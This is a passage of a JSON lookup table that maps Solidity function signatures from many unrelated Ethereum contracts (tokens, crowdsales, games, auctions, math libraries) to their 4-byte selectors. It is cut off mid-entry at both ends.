"refundAction(bytes32,uint256)": "0xe9187ef4", "paymentAction(bytes32,uint256[],uint256[])": "0x27dd16e5", "acceptAndPay(bytes32,uint256[],uint256[],int256)": "0xc1912433", "createAcceptAndPayFromBytes(bytes,address[],uint256[],uint256[])": "0xc4e5b7f2", "createRequestAsPayerAction(address[],int256[],address,uint256[],uint256[],string)": "0xd5d067b0", "createRequestAsPayeeAction(address[],address[],int256[],address,address,string)": "0x629873b2", "subtractAction(bytes32,uint256[])": "0x289b45fb", "additionalAction(bytes32,uint256[])": "0x83565cc7", "cancelAction(bytes32)": "0x781cc3d3", "acceptAction(bytes32)": "0xa9de5045", "createCoreRequestInternal(address,address[],int256[],string)": "0x69a69658", "RequestCurrencyContractInterface(address,address,address)": "0xa18473c2", "Proposals()": "0x56610400", "CallCount()": "0x372cb1d9", "Count()": "0x93a8333e", "TradingAccount()": "0x15409c1d", "preCheckAndPay(string,uint256,address)": "0x2e98a401", "callServer(string,uint256)": "0x1320f614", "getFee(string)": "0xed1eee68", "OCMarket()": "0x11823d43", "getVariables()": "0x94aef022", "_validateId(bytes32)": "0x58c1c328", "confirmReturn()": "0x7b33fa25", "returnMachine()": "0x32f8290c", "claimRental()": "0x801b4189", "rentMachine(address,uint256,uint256,uint256)": "0xd967f752", "createChannel(address)": "0x6e59f3f3", "ChannelFactory()": "0x92b0fed8", "rmax(uint128,uint128)": "0xdd8b0ff6", "rmin(uint128,uint128)": "0x173f22f0", "rpow(uint128,uint64)": "0xc04aa9b8", "rdiv(uint128,uint128)": "0xb7268ef4", "rmul(uint128,uint128)": "0x87aa2bf9", "rsub(uint128,uint128)": "0xc3a8f536", "radd(uint128,uint128)": "0xcc129f4d", "wmax(uint128,uint128)": "0xce10814c", "wmin(uint128,uint128)": "0x5ad95948", "wdiv(uint128,uint128)": "0xd02fcad9", "wmul(uint128,uint128)": "0x8f1eda37", "wsub(uint128,uint128)": "0x523d897e", "wadd(uint128,uint128)": "0x69a046f2", "imax(int256,int256)": "0xae94e448", "imin(int256,int256)": "0xc8e6c7d9", "hmax(uint128,uint128)": "0x3c8f3278", "hmin(uint128,uint128)": "0xc1fb7c34", "hdiv(uint128,uint128)": "0xe5362206", "hmul(uint128,uint128)": "0x101d990c", "hsub(uint128,uint128)": "0x0df18942", "hadd(uint128,uint128)": "0xe4b1e977", "giveMeTokens()": "0x1a363bf1", "Adapter(address,address,address)": "0xbdf79c9d", "mintTokens(int256,uint256,address,bool)": "0xe3a9744b", "freezeTheMoment()": "0x147e51f4", "NeuroDAO(address,uint256)": "0x86647821", "TokenMigration(address,uint256)": "0xb587194e", "firstYearPeriods()": "0x344b8386", "availableTokens(address)": "0x94cb0947", "beforeBalanceChanges(address)": "0x4eec44b4", "sealManualMigration(bool)": "0xa7c8e68a", "setFeeFromPayer()": "0x269eb58c", "disableMaintenance()": "0xbdc0ba8e", "enableMaintenance()": "0xcc0e13e2", "disableApproval()": "0x95eeb240", "enableApproval()": "0xcd584045", "Liquet()": "0x416a1b62", "modExp(uint256,uint256,uint256)": "0x3148f14f", "isSolved(address)": "0x54a874b4", "authorize()": "0xababa4a7", "Access()": "0x5f6076bf", "SchemeRegistrar()": "0xddc23059", "confirmTransfer(uint256)": "0x2c48e7db", "MoratoriumTransfers(uint256,address[],address[])": "0x7cc666da", "getReleased()": "0xf47a6e84", "LinkRevenue()": "0x813f5717", "allowTransfers(bool)": "0xa8b25075", "pauseContribution(bool)": "0x296032f2", "PreSale(address)": "0x51553205", "readContent()": "0xd7a66ebe", "removeSubscriber(address)": "0x627c34ad", "findSignedSubscriberIndex(address)": "0x5fac4996", "findRequiredSubscriberIndex(address)": "0x16164467", "getSignedSubscribers()": "0xd6a02bc2", "getRequiredSubscribers()": "0x34553a44", "addSubscriber(address)": "0x94555d1a", "SmartAgreement(bytes,address[])": "0x7bf796dc", "interface()": "0xa6d72407", "pay(address,bytes12)": "0x4a729fe1", "try_pay(address,bytes12)": "0xad88d8a5", "set_price(bytes12,uint256)": "0x62a52ed6", "set(bytes12,bytes32,uint40)": "0x3f29cd27", "can_get(address,bytes12)": "0x300a246f", "free(bytes12)": "0xc614da67", "token(bytes12)": "0x361b5eaa", "price(bytes12)": "0x9a3ce541", "unpaid(bytes12)": "0x4a3e2b21", "escape(address)": "0x9cb6ed7e", "payBack(address)": "0x6293fd1e", "unlockOutcome(string,uint256)": "0x2dc26661", "donateFromWallet(uint256)": "0xa94385a0", "registerDonation(address,uint256)": "0x3c49dde4", "setContractProvider(address)": "0x9f577c15", "setImpactRegistry(address)": "0x5102ad69", "setJudge(address)": "0xb157c5cd", "Project(string)": "0x14dbb508", "createTimeDecayingToken(uint256,uint256,uint256,uint256,uint256,string,uint8,string,uint8)": "0xe92a5d74", "TimeDecayingTokenFactory(bool,address)": "0x334cc3e5", "migrateTo(address,uint256)": "0x0d213d31", "search(address,address[])": "0x794cea42", "deployVault()": "0x901c4e4f", "RewardDAO(address,address,address)": "0x59011400", "changeMintingAddress(address)": "0x51892f07", "changeCCCoinAddress(address)": "0x91be2f8d", "currentFeePercentage()": "0x8a5fb3ca", "currentMultiplier()": "0x6fbaaa1e", "changeFeePercentage(uint256)": "0xfae14192", "changeMultiplier(uint256)": "0xced92670", "collectPercentOfFees(uint256)": "0x4229616d", "collectFeesInEther(uint256)": "0xb4022950", "collectAllFees()": "0x686f2c90", "addPayout(uint256)": "0x0358d965", "newProposalInEther(address,uint256,string,bytes)": "0xb9f256cd", "newProposalInWei(address,uint256,string,bytes)": "0x83876bc9", "changeUnicorn(uint256,address)": "0x522103fa", "changeMembership(address,uint256,bool,string)": "0x824dbc9a", "auctionEnd()": "0x2a24f46c", "SimpleAuction(address)": "0x6f3a7561", "marriageProof(bytes)": "0xe771066f", "setImage(bytes)": "0x26826bf8", "setStatus(bytes)": "0xaf408d89", "createMarriage(bytes,bytes,uint256,bytes,bytes)": "0xce60f78d", "Marriage()": "0x4cdc6a73", "changeHost(address)": "0x6e940a29", "recordWin(address)": "0x739b47ca", "selectWinner()": "0x33a99e04", "setContribution(uint256)": "0x88017e05", "removeFromContribution(uint256)": "0xe3083fb5", "numWinners()": "0x8b7bcc86", "numContributors()": "0x8f03850b", "EtherWheel(uint256,uint256,uint8)": "0xc478fc37", "delMinter(int256,address)": "0x4594d06a", "isMinter(int256,address)": "0x4b8e1ba8", "TlcCoin()": "0x8691162a", "Diana()": "0xd9d73887", "addDeveloper(address,string)": "0x51d38d5f", "payOut(uint256,string)": "0x9b5fde7d", "returnFunds(uint256)": "0x45755dd6", "CrowdFundDAO(string,uint8,string)": "0xc31d0031", "SafeInvestments()": "0xa3053236", "cashout()": "0x84054d3d", "buyCoins()": "0x9a777d5d", "CrowdCoin()": "0xcc8b34ab", "returnDeposits()": "0x362e2565", "register()": "0x1aa3a008", "lock(uint256)": "0xdd467064", "withdrawFees(address)": "0x164e68de", "setLowerFeePercentage(uint8)": "0x003b9d88", "collectPrize(uint256)": "0xf449619e", "startAuction()": "0x6b64c769", "placeBid()": "0xecfc7ecc", "AllPayAuction()": "0xf9391d24", "PiggyBank()": "0xeebf9808", "TreasureChest()": "0x315fdea3", "changeCompareTo(uint256)": "0x6fc9d5e4", "InterestBank()": "0xabcf1328", "moneySumAtSettlement(address,uint256,uint256,int256,uint256,uint256)": "0x69d79ad5", "getMaxLossAfterTrade(address,uint256,uint256,int256,int256)": "0xfe4667e9", "orderMatch(uint256,uint256,uint256,int256,uint256,uint256,address,uint8,bytes,bytes,int256)": "0xb3760c80", "orderMatchTest(uint256,uint256,uint256,int256,uint256,uint256,address,address,int256)": "0x42bf4431", "addOptionChain(uint256,string,uint256,uint256,bytes,address,int256[])": "0x0448f79f", "expire(uint256,uint256,uint8,bytes,bytes,bytes)": "0x5025b9ae", "getOptionChain(uint256)": "0x177766e6", "Market()": "0x615664ba", "sendBadge(address,uint256)": "0x70844f7a", "badgesOf(address)": "0xd12c1e28", "stop(uint256)": "0x6299f8cf", "start()": "0xbe9a6555", "setRentable(bool)": "0xb29b5366", "setPrice(uint256)": "0x91b7f5ed", "setDeposit(uint256)": "0xf5bade66", "MeterSlock(uint256,uint256,address)": "0x8b9e5385", "reorganizeSubUsers()": "0x1a93fa4b", "removeAllSubUsers()": "0xbaf00f76", "removeSubUser(address)": "0x7ccfd45a", "addSubUser(address)": "0x0870607b", "changeSubUser(address,address)": "0xc5d5997c", "isAUser(address)": "0x018f5472", "isSubUser(address)": "0x6d853ab6", "SubUser()": "0xc2e9fab3", "EthereumDice()": "0x4789aaef", "etherlist_top()": "0xd850288b", "BetOnHashV81()": "0x37ae43a3", "send(address,uint256)": "0xd0679d34", "Coin()": "0xa77b2e37", "stop()": "0x07da68f5", "setPlayersPerRound(uint256)": "0x758b5172", "paybackAll()": "0x72388610", "paybackLast()": "0x9eded57a", "forceFinish()": "0x6bf8f85a", "join()": "0xb688a363", "finishRound()": "0x547916ea", "BetOnHashV82()": "0x8e035ac1", "process_payment()": "0x2431f164", "BlockKing()": "0x2a745971", "FountainOfWealth()": "0xec93cfae", "lastAuction()": "0xed54746e", "acceptTransfer()": "0x547eeac1", "endAuction()": "0xfe67a54b", "bid()": "0x1998aeef", "init()": "0xe1c7392a", "EtherAuction(uint256)": "0xa80d4e9a", "changeMeatParameters(uint256,uint256)": "0x6fa8de90", "MeatConversionCalculator(uint256,uint256)": "0x340ddda6", "randomtests()": "0x5f852975", "getMaximumBetRate()": "0xfa5083fe", "getPacifistmasterReq()": "0x94b9b62f", "getMyPacifist()": "0x946d8806", "getFreePacifist()": "0xaeb94f48", "becomePacifistmaster()": "0x253e7fdf", "PacifistFarmer()": "0x89020fe3", "EtchToken()": "0x51751612", "TEX()": "0x99f9be87", "OpenContract()": "0x47c3114e", "DOGE()": "0x58919155", "ELink()": "0x00afdcef", "FaceterToken(address,address)": "0x8ee030bd", "Kikicoin(uint256,string,string)": "0xf8d09593", "purchaseTrophy(uint256)": "0xd3b6664a", "unlistTrophy(uint256)": "0x277ccada", "listTrophy(uint256,uint256,uint256,uint256)": "0xf66597c2", "grantTrophy(address,bytes32)": "0x452a33f0", "PineappleArcadeTrophy(uint256)": "0x886e549b", "listingActive(uint256)": "0xa553748e", "currentPrice(uint256)": "0x7a3c4c17", "unlist(address,uint256)": "0x49c83e86", "list(address,uint256,uint256,uint256,uint256)": "0xb8bf029b", "MicroBitCoin()": "0xa3faef60", "ASEChain()": "0x767d65ba", "FREEREWARDPPOINT()": "0x57fe5a5f", "rest()": "0xc0ea09d7", "newVoting(string)": "0x89975389", "voteAgainst()": "0x9f396cff", "voteFor()": "0xffaa3608", "reserveBalance()": "0xa10954fe", "tearDown()": "0xec1e6a4f", "setUp(uint256)": "0xdebd122e", "fixedExpUnsafe(uint256,uint8)": "0xfe84c5ec", "fixedLog2(uint256,uint8)": "0x2de954af", "fixedLoge(uint256,uint8)": "0x3ddc8e9c", "lnUpperBound32(uint256,uint256)": "0x970574ac", "ln(uint256,uint256,uint8)": "0x065b1061", "power(uint256,uint256,uint256,uint256,uint8)": "0xb3a41c65", "calculateBestPrecision(uint256,uint256,uint256,uint256)": "0x2f7907e4", "calculateSaleReturn(uint256,uint256,uint8,uint256)": "0xf7a4c45c", "calculatePurchaseReturn(uint256,uint256,uint8,uint256)": "0x949dfa63", "WorkcoinCrowdsale(address)": "0x8e1fda84", "directMint(address,uint256)": "0x2f8bd891", "setSlaveWallet(address)": "0xc7775011", "setMasterWallet(address)": "0xa6c7bf8a", "setSlaveWalletPercent(uint256)": "0xe0a0f50d", "setMinPrice(uint256)": "0x5ea8cd12", "insertStage(uint8,uint256,uint256)": "0xeb8ba66c", "changeStage(uint8,uint256,uint256)": "0x6ed0b9d7", "addStage(uint256,uint256)": "0x9f49cefb", "getVotingWinner(address)": "0xa71ef84d", "setVotingWinner(address)": "0x0151cf1d", "refundVotingTokens(address,address)": "0x2784e3f3", "getNewVoting(uint256,bytes32[],address[],uint256[])": "0x4c352323", "isValidVoting(address)": "0xed4ae6b5", "isAddressVoted(address,address)": "0x1c226164", "isAddressNotVoted(address,address)": "0x6ae85e0d", "isValidProposal(uint256)": "0xd968595f", "refundTokens(address)": "0x455ca9bd", "UKTTokenVoting(uint256,bytes32[],address[],uint256[])": "0xde79fb92", "parseInt(bytes)": "0xe08bc3fe", "NewOrleansCoin()": "0x6f80602b", "ACATokenSale(address,address,uint256,uint256,uint256)": "0x35ba66de", "subPrivateSale(uint256)": "0x5830f2ea", "addPrivateSale(uint256)": "0xcd132aad", "setClaimable(bool)": "0x378c93ad", "setCapacity(uint256,uint256)": "0xdee2b058", "removeAuthorizedExternal(address,address)": "0xa0c8ad10", "addAuthorizedExternal(address,address)": "0xe665dba0", "buyNOS(uint256)": "0xf13cc606", "removeNOSPackage(uint256)": "0xd43582c8", "addNOSPackage(uint256,uint256)": "0x0a0e78e3", "buyEthLootbox(address)": "0x4c6a3334", "removeLootbox(address)": "0x657edc11", "addLootbox(address,uint256)": "0x2bf59135", "_updateToken(uint256,uint256)": "0xe6d17cfc", "_createToken(address,uint256)": "0x823126d5", "_burnFor(address,uint256)": "0x503667bd", "WHOM()": "0xdfb4ae3a", "getPayouts(address)": "0x24d0cc0f", "TrumpBingo()": "0x5337421a", "hasSubstring(string,string)": "0x010b8701", "calcPayouts(bool[])": "0xeda2a0af", "addBid(address,uint256,uint256)": "0x16e807c4", "addWinner(address,uint256,uint256)": "0x898e3950", "FourLeafClover()": "0xcdf45c03", "_Token(string,string)": "0x488683f3", "DragonKing(address,address,address,address,uint8,uint8,uint8,uint16[],uint16[])": "0xfcac1c77", "IBRToken()": "0x419ef898", "BINKEY()": "0x43db7821", "distributeSML(address[],uint256)": "0xd519bdcb", "Smile()": "0x3cc6441d", "migratePlayer(address,address,uint256,uint256,uint256)": "0x8b072f0e", "migrateDungeon(uint256,uint256)": "0xb7526b79", "EDCoreVersion1(address,address,address,address)": "0x51b546af", "_handleTrainingFailure(uint256,uint256,uint256)": "0xf43fd7e0", "_calculateNewHeroPower(uint256,uint256,uint256,uint256,uint256,bool,uint256)": "0xb7491780", "_trainPart2(uint256,uint256,uint256,uint256,uint256,uint256,uint256,uint256)": "0x56a61fc4", "_train(uint256,uint256,uint256,uint256)": "0x67eb5fbe", "getTotalNumberPlayed(uint256,uint256)": "0xcd3fe21d", "getWinNumberAddress(uint256,uint256)": "0x271dd15b", "cloneActiveToPlayed()": "0x0a6aec63", "resetActive()": "0x16d544f1", "setActive(address,address,uint256)": "0xa80a9e40", "setLucky()": "0xa3e31246", "setGame()": "0x5564a08e", "transferDirectly(address,address,uint256)": "0x245e22de", "transferOverBalanceFunds(address,address,uint256)": "0x0201b5d5", "setHookOperator(address)": "0x9204764f", "setExchangeOracle(address)": "0x2be52293", "setRefunder(address)": "0xd74b2722", "calcWeiForTokensAmount(uint256)": "0x2224044c", "convertTokensAmountInWeiAtRate(uint256,uint256)": "0xb46452a1", "setMinWeiAmount(uint256)": "0xebbe05d0", "isInBalanceLimit(address,uint256)": "0xbd24f08a", "isOverBalanceLimitHolder(address)": "0x0871968b", "updateUserRatio(uint256,address)": "0xd1a3fb20", "getKYCVerificationContractAddress()": "0x0e0afb86", "setKYCVerificationContract(address)": "0x6065140b", "kycVerification(address,address,uint256)": "0x8a2693e5", "onBurn(uint256)": "0x0513fc8b", "getICOToken()": "0xab442c59", "setICOToken(address)": "0xb75a0ac6", "getUserManager()": "0x1dffd012", "setUserManager(address)": "0x97d0b02c", "setOverBalanceLimitHolder(address,bool)": "0x115b7fa8", "getBalancePercentageLimit()": "0x8b095904", "setBalancePercentageLimit(uint256)": "0x2ef3a7e1", "upgradeImplementation(address)": "0x83f94db7", "OneCoinOneBeerToken()": "0x61b121f5", "setAirdropAdmin(address,bool)": "0x79aa024e", "NextDistribution(uint256)": "0xd4e75363", "LOL10()": "0xff8f9b9f", "setICOStage(uint256)": "0x2990194a", "destructSale()": "0x66056e8b", "Destruct()": "0x7e1a6753", "setRewardGenerationComplete(bool)": "0xa60eb299", "generateMintEvents(address,uint256)": "0x02ce5fc4", "lastTimeOf(address)": "0x2a491877", "balanceOfBasic(address)": "0xc93e253d", "getIntervalsForWindow(uint256,uint256,uint256,uint256,int256)": "0xfc190261", "intervalAtTime(uint256)": "0x011de7aa", "tokensOwedByInterval(uint256,uint256,uint256)": "0x40db4b09", "tokensOwed(address)": "0x3d5dff53", "vestTokens()": "0xabf0c538", "addReward(address)": "0x9c9b2e21", "raiseEventIfMinted(address,uint256)": "0x2722c043", "transferBasic(address,address,uint256)": "0xb4a93d9b", "ToorToken()": "0x353be218", "stateSuccess(uint256)": "0x0adf331b", "stateFail(uint256)": "0x602d7d62", "updateContractState(uint256,uint8)": "0x1187497e", "createContract(uint256,uint8,uint256,uint256,address,address,address,address,address)": "0xb382b0d6", "setUnlockAddress(address,bool)": "0xae56e668", "setLockAddress(address,bool)": "0x7fd19692", "SelimToken()": "0xd12b88a6", "createProposal(string)": "0x49c2a1a6", "DIGIPLACEDS()": "0x53056351", "PureGold()": "0xf9aef74e", "etherFromAltar()": "0x28ccffe7", "_payEther(uint256)": "0xd89d4404", "_payEtherAndDistribute(uint256)": "0xd24b7090", "setlockall(uint256)": "0xc1eb354a", "WashExchange()": "0x1e74c414", "V1ChainToken()": "0xd7ea977b", "JINS()": "0x2a4802bc", "userAddr()": "0xa277051f", "setVariables(string,address,uint256,int256,bool,bytes32,address[2],uint256[2],int256)": "0x5f5db5dc", "setzUint256Array(uint256[2],int256)": "0xa45858b6", "setzAddressesArray(address[2])": "0xb2173afd", "setzBytes32(bytes32)": "0xbc0aaff2", "setzBool(bool)": "0x8885f2a3", "setzUint256(uint256,int256)": "0x4e2aae36", "setzAddress(address)": "0x30155f5e", "setzString(string)": "0xb32e4207", "TTCTokenERC20(uint256,string,string)": "0x8e66fea2", "GBCToken()": "0x55e7db94", "paybackToOwner(address,uint256)": "0xa1aeb1c2", "paybackToDepositer(address,uint256)": "0x4ec06982", "borrow(address,uint256)": "0x4b8a3529", "fundsAvailable()": "0x4fe0bd1e", "borrowerBalance(address)": "0xba5eceb6", "MFI()": "0xed29c12b", "MyFreeCoins(uint256,string,uint8,string)": "0x69070772", "addLen(string)": "0xe0576665", "getLen(string)": "0x290cba7f", "Cryptrust()": "0x7c267b07", "Codexstandard()": "0xd324191c", "addMembers(address[],uint256[])": "0x3e72b2bb", "mineTokens(address,uint256)": "0xd4b175d4", "BitLumensCrowdsale(address,address)": "0xfa796124", "_calcTokens(uint256,uint256)": "0x2b5faebd", "getSumAmountOfOpenSteps()": "0x84e67523", "getSumAmountOfDisputedStepsProPatient()": "0x76e4660c", "getSumAmountOfDisputedStepsProDoctor()": "0x3b957b67", "getSumAmountOfSuccessfulSteps()": "0x9cccd2a4", "getNumberOfDisputedStepsProPatient()": "0x7b34203d", "getNumberOfDisputedStepsProDoctor()": "0x13a46425", "getNumberOfOpenSteps()": "0x94d0025e", "getRevenue(uint256)": "0x2623f687", "Mimicoin(uint256,string,string)": "0xeb290e12", "addCaller(address)": "0x747293fb", "deleteCaller(uint256)": "0xed46eb52", "transferCallership(address,uint256)": "0xf8cc1055", "CalledA()": "0xde3989f5", "GILLIONTOKEN()": "0xf96b636d", "ALU()": "0x3d79c332", "MoonDust()": "0x84a2f5a4", "raiseMaxNumInterests(uint256)": "0xeb338f4e", "interestResolution(uint8,uint8,uint8,bool)": "0x0500de3e", "combineInterest(uint8,uint8)": "0x36a42675", "findRecentInterest(address)": "0xd9468475", "lookupInterest(uint256,uint256)": "0x2a5c65e4", "beneficiaryAndBirth(bytes32,int256,bytes32)": "0xbbdbd31e", "emergencybeneficiary()": "0x6452a10f", "beneficiary(bytes32,int256)": "0xbf277962", "needsbeneficiary(uint256)": "0xde77743d", "interest(uint8,bool,uint8)": "0x2284a6fa", "AIGInvestment()": "0x318b526c", "DAPPToken()": "0x3b630493", "getIPFSHash(address)": "0xcb0ab425", "setIPFSHash(string)": "0xb8a76f54", "updateTime(uint64)": "0x0bf51f36", "acceptClockmaker()": "0x69401027", "transferClockmaker(address)": "0x0f37e79a", "BigBlockCoin()": "0x996ec1f3", "Dashicoin(uint256,string,uint8,string)": "0x3c8f202e", "TRADERSCOIN()": "0x44e52420", "RgiftTokenSale()": "0x46e87b1e", "setOwner2(address)": "0x5825884f", "setOwner1(address)": "0x1b580620", "expire(bool)": "0x7837848c", "claimGame(uint256)": "0x39236bef", "forfeitGame(uint256)": "0x98be22f7", "revealMove(uint256,uint8,string)": "0xbd675c0e", "joinGame(uint256,uint8)": "0xca6649c5", "abortGame(uint256)": "0x9e231e2d", "createGame(bytes32,uint256,address)": "0x8047cb93", "totalProfit(address)": "0xa9c76999", "RPS(address)": "0xc253400b", "getMaxJump(uint256)": "0x4db77d9d", "countFishAtBase()": "0x22230fc4", "getFishAtBase(uint256)": "0xb60868be", "getAllBonus(uint256,uint256)": "0x3b016d83", "getActiveFish(uint256,uint256)": "0x136b4fea", "getFishByPos(uint256)": "0xecd747de", "getFishIdByPos(uint256)": "0xbe32eeba", "getFishIdByAddress(address)": "0x9b01c7ac", "getFishByAddress(address)": "0xf8ecb558", "getFish(uint32)": "0x4fbf6e9f", "CashOut()": "0xa1e564b1", "MoveFish(uint256,uint256)": "0x754ad981", "MoveToBase(uint256)": "0x82cb08aa", "MoveFromBase(uint256)": "0x93924147", "SafeDeduct(uint256,uint256)": "0x8f99fdab", "DeductABS(uint256,uint256)": "0xd4fa9021", "AddFish()": "0x7c17dc02", "AddFishByToken(address,uint256)": "0x59b62658", "cleanOcean(uint256,uint256,uint256,uint256,uint256,uint256,uint256,uint256,uint256,uint256)": "0x80cae007", "refundFish(address,uint256)": "0xa9030162", "updateMinJump(uint256)": "0xd398806d", "setDefaultMaxJump()": "0xf838ea1a", "updateMaxJump(uint256,uint256)": "0x905473cf", "setExtraConfig(uint256,uint256,uint256,uint256,uint256)": "0xd855c059", "setConfig(uint256,uint256,uint256,uint256)": "0xe5c389cd", "setMaxConfig(uint256,uint256)": "0x181dcbcd", "setRate(uint256,uint256,uint256)": "0x3989c666", "EmontFrenzy(address)": "0x89c9c44a", "ACTToken()": "0x0bc785df", "allocateToken(address,uint256)": "0x0a9ffdb7", "NebulasToken(address,uint256)": "0x6cd38ea0", "ELearningCoinERC()": "0x0f1fd654", "TulipToken()": "0xa1b289dd", "resumeAuction()": "0x32353fbd", "pauseAuction()": "0xb9ae7364", "LUCToken(uint256)": "0x7b9c7437", "MartinKoTokenHolder()": "0xbf26bf58", "WithdrawDevFunds()": "0x8357417d", "AddNewPrestige(uint256,uint256,uint256)": "0x664b885e", "AddorModifyRig(uint256,uint256,uint256,uint256)": "0x669d8dff", "AddNewBooster(uint256,int256,uint256,uint256,uint256,uint256,uint256)": "0xfec1c41f", "WithdrawICOEarnings()": "0xd511beec", "FundICO(uint256)": "0x1fd86a6a", "ReleaseICO()": "0xdee8bd51", "BuyBooster(uint256)": "0x4bc3df81", "UpdateMoney(address)": "0x86f3c026", "PrestigeUp()": "0xf7e3c068", "UnlockRig(uint8)": "0x4deb9f47", "StartNewMiner(address)": "0x161fc5b3", "GetMinerUnclaimedICOShare(address)": "0x3a70eabd", "GetMinerICOData(address,uint256)": "0xb4beff8a", "GetICOData(uint256)": "0xcb68780f", "GetCurrentICOCycle()": "0x9f0eed0f", "HasBooster(address,uint256)": "0x104bff92", "GetBoosterData(uint256)": "0xe0d3558e", "GetBoosterCount()": "0x7bb866c1", "GetPrestigeInfo(uint256)": "0xb99371a0", "GetMaxPrestigeLevel()": "0x49e9cee9", "CalculatePriceofRigs(uint256,uint256,uint256)": "0x0142f904", "getNumOrdersByPayee()": "0xff0f2e80", "getOwnOrderByIndex(uint256)": "0x2aa2f7a4", "getNumOrdersByOwner()": "0x9bfe7bd5", "createStandingOrder(address,uint256,uint256,uint256,string)": "0x4ae184f2", "Terminate()": "0x9445eb3a", "WithdrawOwnerFunds(uint256)": "0xcffdc976", "collectFunds()": "0x5b980628", "getOwnerFunds()": "0xcf1578dc", "getUnclaimedFunds()": "0xbef973e4", "getEntitledFunds()": "0x777e6b1c", "StandingOrder(address,address,uint256,uint256,uint256,string)": "0xeaa643d5", "overflowResistantFraction(uint256,uint256,uint256)": "0x1a8943dd", "div256_128By256(uint256,uint256,uint256)": "0x3b130649", "mul256By256(uint256,uint256)": "0x0cda88ce", "updateCredit(address)": "0x45c08718", "cancelCredit(address)": "0x80e15b56", "payImportTax(address,uint256)": "0x58e8922b", "payTrnsTax(address,uint256)": "0x198ae785", "payAccTax(uint256)": "0xc1889ff2", "exchange(address,address,uint256)": "0x969e3756", "transfer(string,address,address,uint256)": "0x2952438e", "createCommunity(string,string,string,string,uint256,uint256,uint256,uint256,bool,uint256,uint256,uint256)": "0x552405b0", "deleteMemberOfCommunity(address,uint256)": "0xefbcae98", "makeMemberOfCommunity(address,uint256)": "0x2db8069f", "ethyclos()": "0xfd68f377", "getCreateReputationTokenUniverse()": "0x211f0b93", "execute(bytes32,address,int256)": "0x310ce4e2", "changeWorkerBalance(address,uint256)": "0x7ba22e1e", "sendTokensBack()": "0xe097e7b9", "sendTokensToWorkers(uint8,uint8)": "0xf77267ea", "tryToCloseProject()": "0xf064b971", "tryToCompleteProject()": "0xb8c7e354", "getWorkerBalance(address)": "0x4d0de225", "stopCollectSignatures()": "0x139ccd1e", "checkerSign(bool)": "0x0b9fc8fb", "ProjectValidation(address,address,address,address[],address)": "0xedd36afd", "ProofImpl(address)": "0x4a3d5ec9", "finishVotingPublic(address,uint256)": "0xaa01ef7d", "votePublic(address,bool)": "0x2bc542a4", "projectInfoPublic(address)": "0x2703e545", "deployProject(uint256,bytes32)": "0xb4025b92", "ProofPublicVote(address)": "0xaa284a4a", "setHash(uint16,bytes32)": "0xc364a25d", "swypeCode()": "0x46975b9a", "setProofImpl(address)": "0x6a3f89f4", "Proof(address)": "0x44f1ee5b", "setHash(address,uint16,bytes32)": "0x3b57aa90", "swypeCode(address)": "0x61e0f7a8", "removeExternalController(address)": "0x2f9b4096", "addExternalController(address)": "0x8e8e75fb", "ProofFund(address)": "0xe417c62c", "setMigrationAgent(address)": "0x75e2ff65", "TokenMigration(address)": "0xb5c61e90", "migrateFrom(address,uint256)": "0x7a3130e3", "finishVoting(uint256)": "0xabe7c08e", "vote(bool)": "0x4b9f5c98", "votingInfo()": "0x19e7998c", "startVoting(uint256)": "0x3d2f5bda", "ProofVote(address)": "0xe48db5d4", "withdrawBack()": "0x0a692347", "finishTokensSale(uint256)": "0x49866ec0", "timeToFinishTokensSale()": "0x7a26924f", "startTokensSale(address,uint256,uint256,uint256,uint256)": "0x6f5831cb", "mintTokens(int256,address,uint256,uint256)": "0x478609f7", "depositUSD(address,uint256)": "0xdd15f993", "Crowdsale(address)": "0xaac5ab61", "sealManualMigration()": "0xf8ba7317", "migrateManual(address)": "0xf96eb003", "ManualMigration(address)": "0xe174f106", "testSwapTop()": "0x2a48cabb", "testPop()": "0x3823df95", "testPush()": "0x9a8cea55", "testInit()": "0xb5d11e99", "TestEvmStack()": "0x9edd1bd2", "getHash()": "0xd13319c4", "getUrl()": "0xd6bd8727", "getDesc()": "0x644d8164", "addThing(bytes32,bytes32,bytes32,bytes32)": "0x8f96a1ea", "registrarInfo()": "0x8d1eaf78", "DeployENS()": "0x6564a7af", "isModuleHandler(address)": "0xc679580e", "registerModuleHandler(address)": "0x069a2e73", "_newSchellingRoundEvent(uint256,uint256)": "0x3590699d", "_transferEvent(address,address,uint256)": "0x28fb29d7", "_replaceModule(address)": "0xc4545e6d", "_disconnectModule()": "0x066f8a7d", "_connectModule()": "0xdbf517a2", "_replaceModuleHandler(address)": "0x56b5d0eb", "_disableModule(bool)": "0xe681e906", "module(address)": "0x388085be", "acceptNegotiationTenant()": "0x7ed02af9", "acceptNegotiationOwner(address)": "0x199a620a", "rejectNegotiation(address)": "0x9bcc9123", "updateCondition(uint256,uint256,uint256,uint256)": "0xb2e2c1c9", "getLocality()": "0xb2b5f86f", "EjariRulesC()": "0xb473d3b6", "Locality(string)": "0xa8eee036", "getAccountAddress()": "0x0e2562d9", "Person(string,address)": "0xa54799bd", "rate(uint256)": "0xe7ee6ad6", "setWinnerPlaceDistribution(uint256,uint256)": "0x1d75493a", "setCountWinnerPlace(uint256)": "0x695e54c3", "setWinnerTimeStatus(bool)": "0x354a5137", "createTokenByHWC(address,uint256)": "0x1fe8149e", "setHWCDeposit(address,uint256)": "0xd87e568a", "getHWCAddress(address)": "0xe22a9877", "getHWCAddressByIndex(uint256)": "0x9a317cca", "getHWCAddressCount()": "0x27678dca", "registerHWCWit(string)": "0xb9ad771c", "registerHWCDep(string)": "0x22b2ea22", "_addToFundHWC(uint256)": "0x52fdeef5", "toForecastData(uint8,uint8,bool,uint8,uint8)": "0x3db05068", "gameResult(uint256,uint256,uint256,bool,uint256,uint256)": "0xe2aa6003", "setPriceFactor(uint256)": "0xefbd8a92", "setPrizeFundFactor(uint256)": "0x3dbb7f46", "setGameCloneFee(uint256)": "0xe5dc67d6", "calculateScore(uint256,uint256)": "0x1cb9a02a", "getForecastScore(uint256)": "0x96bc3f3a", "getScore(uint256,uint256,uint256[])": "0x5135d28d", "getScore(uint256)": "0x0e1af57b", "getForecastCount(uint256,uint256,bool)": "0x1b3ff96f", "calculateTokenPrice(uint256)": "0x072de7f3", "forecastInfo(uint256)": "0x5faf6675", "forecastOfToken(uint256)": "0x594742da", "createForecast(uint256,uint256,uint8,uint8,bool,uint8,uint8)": "0x8095cc36", "cloneAccount(uint256)": "0xc08eea14", "_addToFund(uint256,bool)": "0x1d74c1a8", "_createForecast(uint256,uint256,uint256)": "0x510e4235", "_createToken(uint256,address)": "0x3955b6af", "beneficiariesLength()": "0xc0659108", "Balance()": 